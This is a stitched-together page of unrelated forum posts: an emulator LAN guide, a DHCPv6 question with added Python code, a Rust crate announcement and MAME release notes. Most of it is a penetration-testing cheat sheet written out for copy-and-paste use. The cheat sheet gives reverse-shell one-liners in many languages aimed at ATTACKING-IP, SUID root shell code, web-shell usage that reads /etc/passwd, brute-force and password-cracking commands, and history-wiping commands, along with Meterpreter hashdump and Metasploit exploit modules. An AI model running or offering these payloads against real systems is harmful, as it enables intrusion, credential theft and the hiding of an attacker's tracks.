Packet Trace Guide – Kemp Support

Written tutorial for getting Godzilla: Save the Earth online

Copy and Pasted from my txt doc
Tutorial for getting Godzilla: Save The Earth working on LAN with LogMeIn Hamachi

Programs you will need, with links provided:
Winpcap, Windip, DISCIDUTIL3.0_CD, and the dev9 gigarazi plugin are all in this link
https://forums.pcsx2.net/Thread-How-To-Play-Online-Guide
To play LAN, you will need a network adapter startup disc, which I will not provide a link for, and LogMeIn Hamachi.
https://www.vpn.net/

To start, install winpcap, and then configure the DEV9 plugin in pcsx2 binaries to GiGaHeRz's DEV9 Driver 0.3.0
Then, Add DISCIDUTIL3.0_CD, and the Network Adapter Startup Disc to your ISO selector, along with your Godzilla: STE disc.

Run DISCIDUTIL3.0_CD, then swap discs to the Godzilla: STE disc, and press x, then see the disc ID, which will read 00 00 00 00 12
(or any other numbers), then run winDIP, and select the Godzilla: STE disc, and click Scan File, then Verify Version
Then enter in the disc ID, then click patch. Once that is done, click OK.


Set up Logmein Hamachi, and create a network
Go into pcsx2, and click Config, then click Plugin/BIOS Selector, then click configure next to the changed Dev9 plugin.
After clicking configure, click the checkbox under "ethernet" that says enabled, then under "Ethernet Device", click
"pcap bridge LogMeIn Inc."
Once that is done, run the Network Adapter Startup Disc, and if the option comes up, click format

Click Isp Setup, and click OK until the age comes up, then agree to the privacy policy, then enter in the info it asks for.
(not sure if the email needs to be accurate)
Once the info is put in, continue to just click OK, then name your ISP setting, then click yes for subscribing, then click
high speed connection, then select Manual Settings.
To get your ip address, netmask, and default router address, search for "command prompt" on your pc, and open it.
Once it is opened, type "ipconfig" and the numbers that are important are the first IPv4 Address, Subnet Mask, and Default
Gateway. In the default gateway, two strings of numbers will show up, pay attention to the second one, probably looking like
XX.X.X.X
Only pay attention to the first 3 codes requested, and if a number is a two digit or 1 digit number, have a 0 in front of it.
(so 12 being 012, etc)
Enter those in, and have someone else join your hamachi network, select Multi-player in Godzilla: STE, and select "Network Play"
Create a game on there, and if your friend is connected through Hamachi, they should be able to see it, and join.

I am creating a discord for people who want to play this game with others online, or just discuss and have fun, the discord link
will be here: YAt8MMX
submitted by RTXdestroyer to GODZILLA

ISC DHCPD 4.3 IPv6 logging

We've been running DHCPD for years and just ran into a problem that has stumped me for weeks. I'm hoping there are some experts here that have overcome this issue before.
We normally log option 82 with our IPv4 clients which includes a text string from a downstream fibre to the home access node. The string is ASCII and looks something similar to: "NODE 1/1/4/1/xyz12345678"
We then log this with client.remote-id. No issues, been doing it for years.
Recently we've been working towards a general customer IPv6 dual-stack roll out. Our access gear provides the identical string as above in option 37. We use v6relay to pick out the correct string. Problem is the string comes encoded as per the RFC. Using binary-to-ascii(16,8,"", v6relay(1, option client.remote-id)) yields nothing. As a matter of fact the entire log line is skipped. I've tried some other binary to ascii options without success. If I extract the value of option 37 from a pcap (nested value 1... because the access gear + cisco router with ip helper both add option 37 values) I can see the value is encoded as hex. If I grab the value and paste it into any hex to ascii converter everything is there.
Am I missing something here with binary-to-ascii, or is this just not doable in the dhcpd config file?
E: autocorrect typo
submitted by LitreAhhCola to sysadmin
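An added example (not from the post) in Python that unwraps a constructed DHCPv6 Relay-forward chain and pulls the RFC 4649 Remote-ID (option 37) out of a chosen relay layer, the way v6relay(1, ...) selects the first relay's copy. The access-node/router nesting, the remote-id strings and the enterprise numbers are constructed, and mapping level 1 to the relay closest to the client is an assumption about dhcpd's numbering.

```python
import struct

# DHCPv6 message types and option codes from RFC 8415, plus the Relay Agent
# Remote-ID option (code 37) from RFC 4649.
MSG_SOLICIT = 1
MSG_RELAY_FORW = 12
MSG_RELAY_REPL = 13
OPT_CLIENTID = 1
OPT_RELAY_MSG = 9
OPT_REMOTE_ID = 37


def parse_options(buf):
    """Parse a DHCPv6 option list into (code, value) pairs, rejecting truncation."""
    opts, off = [], 0
    while off + 4 <= len(buf):
        code, length = struct.unpack_from("!HH", buf, off)
        off += 4
        if off + length > len(buf):
            raise ValueError("option %d runs past end of message" % code)
        opts.append((code, buf[off:off + length]))
        off += length
    if off != len(buf):
        raise ValueError("trailing bytes after last option")
    return opts


def unwrap_relays(msg):
    """Peel Relay-forward/Relay-reply layers off a DHCPv6 message.

    Returns one option list per relay layer, outermost first, followed by
    the option list of the innermost (client) message."""
    layers = []
    while True:
        if not msg:
            raise ValueError("empty message")
        if msg[0] in (MSG_RELAY_FORW, MSG_RELAY_REPL):
            # msg-type(1) hop-count(1) link-address(16) peer-address(16) options
            if len(msg) < 34:
                raise ValueError("short relay header")
            opts = parse_options(msg[34:])
            layers.append(opts)
            inner = [v for c, v in opts if c == OPT_RELAY_MSG]
            if len(inner) != 1:
                raise ValueError("relay layer must carry exactly one Relay Message option")
            msg = inner[0]
        else:
            # msg-type(1) transaction-id(3) options
            if len(msg) < 4:
                raise ValueError("short client header")
            layers.append(parse_options(msg[4:]))
            return layers


def remote_id_at_level(msg, level):
    """Return (enterprise_number, remote_id_text) from option 37 at a relay level.

    Level 1 is the relay closest to the client (assumed here to match
    v6relay(1, ...)), level 2 the next one out, and so on. Returns None
    when the level exists but carries no Remote-ID option."""
    layers = unwrap_relays(msg)
    n_relays = len(layers) - 1
    if not 1 <= level <= n_relays:
        raise ValueError("message has %d relay layer(s), no level %d" % (n_relays, level))
    for code, val in layers[n_relays - level]:
        if code == OPT_REMOTE_ID:
            if len(val) < 4:
                raise ValueError("Remote-ID option shorter than its enterprise-number field")
            enterprise = struct.unpack("!I", val[:4])[0]
            # The first four bytes are the vendor enterprise number, not text;
            # decoding the whole option as text would prepend four stray bytes
            # to the access node's string.
            return enterprise, val[4:].decode("ascii", errors="replace")
    return None


def option(code, value):
    return struct.pack("!HH", code, len(value)) + value


def build_sample_message():
    """Constructed sample: a Solicit relayed first by an access node, then a router."""
    solicit = bytes([MSG_SOLICIT, 0x12, 0x34, 0x56]) + option(
        OPT_CLIENTID, b"\x00\x03\x00\x01\x00\x11\x22\x33\x44\x55")
    # Enterprise numbers 1234 and 9 are made-up values for the example.
    access_rid = struct.pack("!I", 1234) + b"NODE 1/1/4/1/xyz12345678"
    relay1 = (bytes([MSG_RELAY_FORW, 0]) + b"\x00" * 32
              + option(OPT_REMOTE_ID, access_rid) + option(OPT_RELAY_MSG, solicit))
    router_rid = struct.pack("!I", 9) + b"Gi0/0/1"
    relay2 = (bytes([MSG_RELAY_FORW, 1]) + b"\x00" * 32
              + option(OPT_REMOTE_ID, router_rid) + option(OPT_RELAY_MSG, relay1))
    return relay2


if __name__ == "__main__":
    pkt = build_sample_message()
    print(remote_id_at_level(pkt, 1))  # access node's string
    print(remote_id_at_level(pkt, 2))  # router's string
```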

Const-adventures: A port of Python's struct-module

TL;DR: restruct is a port of Python's struct module as a proc-macro, allowing to write simple parsers/writers for structured binary data.
If one needs to read or write structured binary data, the options are to either do it manually, do it semi-manually via byteorder or use a full-blown parser generator. As an intermediate solution, Python has the struct-module, which uses a small DSL to describe the exact layout of data-structures and then read/write those structures either in IO- or FFI-situations.
With proc-macros and const-functions on the rise in Rust, and purely as an experiment, I ported Python's struct-module to Rust as a proc-macro. The implementation derives types that can read/write binary data in the given format:
    // Generate a parser in little-endian for two 32bit integers, a float and a bool.
    #[derive(restruct_derive::Struct)]
    #[fmt="<2if?"]
    struct FooParser;

    // Pack a tuple of two integers, a float and a bool into a [u8; _]-buffer.
    let packed = FooParser::pack((1, 2, 3.0, false));
    assert_eq!(packed.len(), FooParser::SIZE);

    // Packing and unpacking can't fail at runtime.
    let unpacked = FooParser::unpack(packed);
    assert_eq!(unpacked, (1, 2, 3.0, false));
As a special quirk, the proc-macro goes through great pains to make those functions const; they may, therefore, be used to initialize other constants:
    #[derive(restruct_derive::Struct)]
    #[fmt="<2if?"]
    struct Tea;

    const TEAPOT: ::Unpacked = Tea::unpack(*include_bytes!("teapot.bin"));
    const TEAPOT_TEMPERATURE: i32 = TEAPOT.0;
    const TEAPOT_FILL_STATUS: f32 = TEAPOT.2;
    const TEAPOT_ACTIVE: bool = TEAPOT.3;
Functions are also provided to interact with any std::io::Read/Write or read raw data from memory. In not-const context, packing/unpacking should almost always boil down to zero-cost.

Docs with lots of examples can be found here, an extremely small reader for Pcap-Files is found here.
The crate currently needs nightly and does some shady stuff to accomplish the above. If anyone wants to break things, feel free :-)
submitted by ebfeebfe to rust

MAME 0.192


Even if you’re still feeling burned from Singles’ Day, Thanksgiving, and/or Black Friday, MAME 0.192 is here, and there’s plenty packed into this update. At long last, the MCU for Ping Pong King is simulated, making the game playable, and Flower now runs better than it ever did. Taito’s abstract maze game Marine Date is also emulated better than ever, although there are still some issues with collision detection. We’ve got newly dumped prototypes, including a prototype of Battlecry, and a more complete version of Grudge Match that appears to come from a location test in Italy. Many of the Aristocrat MK5 gambling machines have been redumped so the ROM checksums pass and they boot. Missing graphics in the Merit Megatouch games have been fixed.
But we know that rumours about the next part of this announcement have made lots of arcade fans excited: IGS PGM2 software is showing signs of life. I’m sure at least some of you are wondering how this was achieved. Usual suspects Morten Shearman Kirkegaard and Peter Wilhelmsen (recently featured here in connection to their success in dumping Gaelco protection programs) have built another FPGA-based rig that allowed them to dump the internal programs from the ARM CPUs for Oriental Legend 2 and Knights of Valour 2 New Legend. On top of this, there are some nice performance improvements to MAME’s MPEG audio decoding that should benefit other systems as well.
In computer system emulation, we’ve got a number of graphical fixes for FM Towns, heaps of improvements for the Tatung Einstein, No-Slot Clock support for the Apple //e family, and support for some Brazilian CoCo clones from Prológica and Codimex. There are some big updates to the PC software lists, too. The ACI Destiny Prodigy, Mephisto RISC 1MB and Mephisto RISC II chess computers are now working. Finally, the Interpro drivers have numerous improvements, including preliminary keyboard/video support.
That’s just scratching the surface – there are far more bug fixes, newly dumped systems and performance improvements. You can get the source or Windows binaries from the download page.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to emulation

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target - As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover

SMB enumeration

ls /usr/share/nmap/scripts/* | grep ftp - Search nmap scripts for keywords
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off this inverse name lookup, for hanging resolution
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

Python Local Web Server

python -m SimpleHTTPServer 80 - Run a basic http server, great for serving up shells etc

Mounting File Shares

mount 192.168.1.1:/vol/share /mnt/nfs - Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs - Mount Windows CIFS / SMB share on Linux at /mnt/cifs; if you remove password it will prompt on the CLI (more secure as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no - Mount a Windows share on Windows from the command line
apt-get install smb4k -y - Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

nc -v 192.168.1.1 25 - telnet 192.168.1.1 25 - Basic versioning / finger printing via displayed banner

SNMP Enumeration

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d* * -f
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts

DNS Zone Transfers

nslookup -> set type=any -> ls -d blah.com - Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com - Linux DNS zone transfer

DNSRecon

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

nikto -h 192.168.1.1 - Perform a nikto scan against target
dirbuster - Configure via GUI, CLI input doesn't work most of the time

Packet Inspection

tcpdump tcp port 80 -w output.pcap -i eth0 - tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX - Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt - RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

snmpwalk public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 - Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX - Enumerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt (then grep) - Search for SNMP servers with nmap, grepable output

Passwords

/usr/share/wordlists - Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V - Hydra FTP brute force

Hydra POP3 Brute Force

hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V - Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V - Hydra SMTP brute force

Password Cracking

John The Ripper - JTR
john --wordlist=/usr/share/wordlists/rockyou.txt hashes - JTR password cracking
john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt - JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show - JTR forced descrypt brute force cracking

Exploit Research

searchsploit windows 2003 | grep -i local - Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 - Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* - Search metasploit modules using grep - msf search sucks a bit

Linux Penetration Testing Commands

Linux Network Commands

netstat -tulpn - Show Linux network ports with process ID's (PIDs)
watch ss -stplu - Watch TCP, UDP open ports in real time with socket summary.
lsof -i - Show established connections.
macchanger -m MACADDR INTR - Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24 - Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24 - Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR - Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500 - Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1 - Dig reverse lookup on an IP address.
host 192.168.1.1 - Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR - Perform a DNS zone transfer using dig.
host -l domain.com nameserver - Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x - Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0 - Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com - Blocks access to google.com from the host machine.
echo "1" > /proc/sys/net/ipv4/ip_forward - Enables IP forwarding, turns Linux box into a router - handy for routing traffic through a box.
echo "nameserver 8.8.8.8" > /etc/resolv.conf - Use Google DNS.

System Information Commands

Useful for local enumeration.

whoami - Shows currently logged in user on Linux.
id - Shows currently logged in user and groups for the user.
last - Shows last logged in users.
mount - Show mounted drives.
df -h - Shows disk usage in human readable output.
echo "user:passwd" | chpasswd - Reset password in one line.
getent passwd - List users on Linux.
strings /usr/local/bin/blah - Shows printable contents of non-text files, e.g. what's in a binary.
uname -ar - Shows running kernel version.
PATH=$PATH:/my/new-path - Add a new PATH, handy for local FS manipulation.
history - Show bash history, commands the user has entered previously.

Redhat / CentOS / RPM Based Distros

cat /etc/redhat-release - Shows Redhat / CentOS version number.
rpm -qa - List all installed RPMs on an RPM based Linux distro.
rpm -q --changelog openvpn - Check installed RPM is patched against CVE, grep the output for CVE.

YUM Commands

Package manager used by RPM based systems; you can pull some useful information about installed packages and / or install additional tools.

yum update - Update all RPM packages with YUM, also shows what's out of date.
yum update httpd - Update individual packages, in this example HTTPD (Apache).
yum install package - Install a package using YUM.
yum --exclude=package kernel* update - Exclude a package from being updated with YUM.
yum remove package - Remove package with YUM.
yum erase package - Remove package with YUM.
yum list package - Lists info about yum package.
yum provides httpd - What a package does, e.g Apache HTTPD Server.
yum info httpd - Shows package info, architecture, version etc.
yum localinstall blah.rpm - Use YUM to install local RPM, settles deps from repo.
yum deplist package - Shows deps for a package.
yum list installed | more - List all installed packages.
yum grouplist | more - Show all YUM groups.
yum groupinstall 'Development Tools' - Install YUM group.

Debian / Ubuntu / .deb Based Distros

cat /etc/debian_version - Shows Debian version number.
cat /etc/*-release - Shows Ubuntu version number.
dpkg -l - List all installed packages on Debian / .deb based Linux distro.

Linux User Management

useradd new-user - Creates a new Linux user.
passwd username - Reset Linux user password, enter just passwd if you are root.
deluser username - Remove a Linux user.

Linux Decompression Commands

How to extract various archives (tar, zip, gzip, bzip2 etc) on Linux and some other tricks for searching inside of archives etc.

unzip archive.zip - Extracts zip file on Linux.
zipgrep *.txt archive.zip - Search inside a .zip archive.
tar xf archive.tar - Extract tar file Linux.
tar xvzf archive.tar.gz - Extract a tar.gz file Linux.
tar xjf archive.tar.bz2 - Extract a tar.bz2 file Linux.
tar ztvf file.tar.gz | grep blah - Search inside a tar.gz file.
gzip -d archive.gz - Extract a gzip file Linux.
zcat archive.gz - Read a gz file Linux without decompressing.
zless archive.gz - Same function as the less command for .gz archives.
zgrep 'blah' /var/log/maillog*.gz - Search inside .gz archives on Linux, search inside of compressed log files.
vim file.txt.gz - Use vim to read .txt.gz files (my personal favorite).
upx -9 -o output.exe input.exe - UPX compress .exe file Linux.

Linux Compression Commands

zip -r file.zip /dir/* - Creates a .zip file on Linux.
tar cf archive.tar files - Creates a tar file on Linux.
tar czf archive.tar.gz files - Creates a tar.gz file on Linux.
tar cjf archive.tar.bz2 files - Creates a tar.bz2 file on Linux.
gzip file - Creates a file.gz file on Linux.

Linux File Commands

du -sh blah - Display size of file / dir Linux.
diff file1 file2 - Compare / Show differences between two files on Linux.
md5sum file - Generate MD5SUM Linux.
md5sum -c blah.iso.md5 - Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah - Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix - Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file - Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file - Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file - Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf - Remove files and directories without prompting for confirmation.

Samba Commands

Connect to a Samba share from Linux.

$ smbmount //server/share /mnt/win -o user=username,password=password1
$ smbclient -U user \\server\share
$ mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share

Breaking Out of Limited Shells

Credit to G0tmi1k for these (or wherever he stole them from!).

The Python trick:

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

Misc Commands

init 6 - Reboot Linux from the command line.
gcc -o output input.c - Compile C code.
gcc -m32 -o output input.c - Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTFILE - Disable bash history logging.
rdesktop X.X.X.X - Connect to RDP server from Linux.
kill -9 $$ - Kill current session.
chown user:group blah - Change owner of file or dir.
chown -R user:group blah - Change owner of file or dir and all underlying files / dirs - recursive chown.
chmod 600 file - Change file / dir permissions, see Linux File System Permissions for details.
Clear bash history - $ ssh [email protected] | cat /dev/null > ~/.bash_history

Linux File System Permissions

777 rwxrwxrwx No restriction, global WRX any user can do anything.
755 rwxr-xr-x Owner has full access, others can read and execute the file.
700 rwx------ Owner has full access, no one else has access.
666 rw-rw-rw- All users can read and write but not execute.
644 rw-r--r-- Owner can read and write, everyone else can read.
600 rw------- Owner can read and write, everyone else has no access.

Linux File System

/ - also known as "slash" or the root.
/bin - Common programs, shared by the system, the system administrator and the users.
/boot - Boot files, boot loader (grub), kernels, vmlinuz
/dev - Contains references to system devices, files with special properties.
/etc - Important system config files.
/home - Home directories for system users.
/lib - Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found - Files that were saved during failures are here.
/mnt - Standard mount point for external file systems.
/media - Mount point for external file systems (on some distros).
/net - Standard mount point for entire remote file systems - nfs.
/opt - Typically contains extra and third party software.
/proc - A virtual file system containing information about system resources.
/root - root user's home dir.
/sbin - Programs for use by the system and the system administrator.
/tmp - Temporary space for use by the system, cleaned upon reboot.
/usr - Programs, libraries, documentation etc. for all user-related programs.
/var - Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler. Web servers, Databases etc.

Linux Interesting Files / Dir’s

Places that are worth a look if you are attempting to privilege escalate / perform post exploitation.

Directory Description

/etc/passwd - Contains local Linux users.
/etc/shadow - Contains local account password hashes.
/etc/group - Contains local account groups.
/etc/init.d/ - Contains service init scripts - worth a look to see what's installed.
/etc/hostname - System hostname.
/etc/network/interfaces - Network interfaces.
/etc/resolv.conf - System DNS servers.
/etc/profile - System environment variables.
~/.ssh/ - SSH keys.
~/.bash_history - User's bash history log.
/var/log/ - Linux system log files are typically stored here.
/var/adm/ - UNIX system log files are typically stored here.
/var/log/apache2/access.log & /var/log/httpd/access.log - Apache access log file typical path.
/etc/fstab - File system mounts.

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h - Linux exploit code

Build Exploit GCC

gcc -o exploit exploit.c - Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

gcc -m32 exploit.c -o exploit - Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe - Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.

Below are some quick copy and paste examples for various shells:

SUID C Shell for /bin/bash

int main(void){
    setresuid(0, 0, 0);
    system("/bin/bash");
}

SUID C Shell for /bin/sh

int main(void){
    setresuid(0, 0, 0);
    system("/bin/sh");
}

Building the SUID Shell binary

gcc -o suid suid.c
gcc -m32 -o suid suid.c - for 32bit

Setup Listening Netcat

Your remote shell will need a listening netcat instance in order to connect back.

Set your Netcat listening shell on an allowed port

Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443

To setup a listening netcat instance, enter the following:

[email protected]:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...

NAT requires a port forward

If your attacking machine is behind a NAT router, you'll need to setup a port forward to the attacking machine's IP / Port.

ATTACKING-IP is the machine running your listening netcat session; port 80 is used in all examples below (for reasons mentioned above).

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6)

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the attacking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk Reverse Shell

#!/usr/bin/gawk -f

BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Kali Web Shells

The following shells exist within Kali Linux, under /usr/share/webshells/; these are only useful if you are able to upload, inject or transfer the shell to the machine.

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php - Pen Test Monkey - PHP Reverse Shell
/usr/share/webshells/php/php-findsock-shell.php
/usr/share/webshells/php/findsock.c - Pen Test Monkey, Findsock Shell. Build gcc -o findsock findsock.c (be mindful of the target server's architecture), execute with netcat not a browser nc -v target 80
/usr/share/webshells/php/simple-backdoor.php - PHP backdoor, useful for CMD execution if upload / code injection is possible, usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php - Larger PHP shell, with a text input box for command execution.

Tip: Executing Reverse Shells

The last two shells above are not reverse shells; however they can be useful for executing a reverse shell.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl - Pen Test Monkey - Perl Reverse Shell
/usr/share/webshells/perl/perlcmd.cgi - Pen Test Monkey, Perl Shell. Usage: http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm - Cold Fusion Shell - aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/ - Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/ - Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp - Kali JSP Reverse Shell

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick - python -c 'import pty;pty.spawn("/bin/bash")' - echo os.system('/bin/bash')
Spawn Interactive sh shell - /bin/sh -i
Spawn Perl TTY Shell - exec "/bin/sh"; perl -e 'exec "/bin/sh";'
Spawn Ruby TTY Shell - exec "/bin/sh"
Spawn Lua TTY Shell - os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi: - :!bash
Spawn TTY Shell NMAP - !sh

SSH Port Forwarding

ssh -L 9999:10.0.2.2:445 [email protected] - Port 9999 locally is forwarded to port 445 on 10.0.2.2 through host 192.168.2.250

SSH Port Forwarding with Proxychains

ssh -D 127.0.0.1:9050 [email protected] - Dynamically allows all port forwards to the subnets available on the target.

Meterpreter Payloads

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp - Windows reverse tcp payload

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp - Meterpreter Windows VNC Payload
set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp - Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

upload file c:\windows - Meterpreter upload file to Windows target
download c:\windows\repair\sam /tmp - Meterpreter download file from Windows target
execute -f c:\windows\temp\exploit.exe - Meterpreter run .exe on target - handy for executing uploaded exploits
execute -f cmd -c - Creates new channel with cmd shell
ps - Meterpreter show processes
shell - Meterpreter get shell on the target
getsystem - Meterpreter attempts privilege escalation on the target
hashdump - Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target - Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target - Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

use exploit/windows/smb/ms08_067_netapi - MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi - MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index - MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac - Bypass UAC on Windows 7 + Set target + arch, x86/64

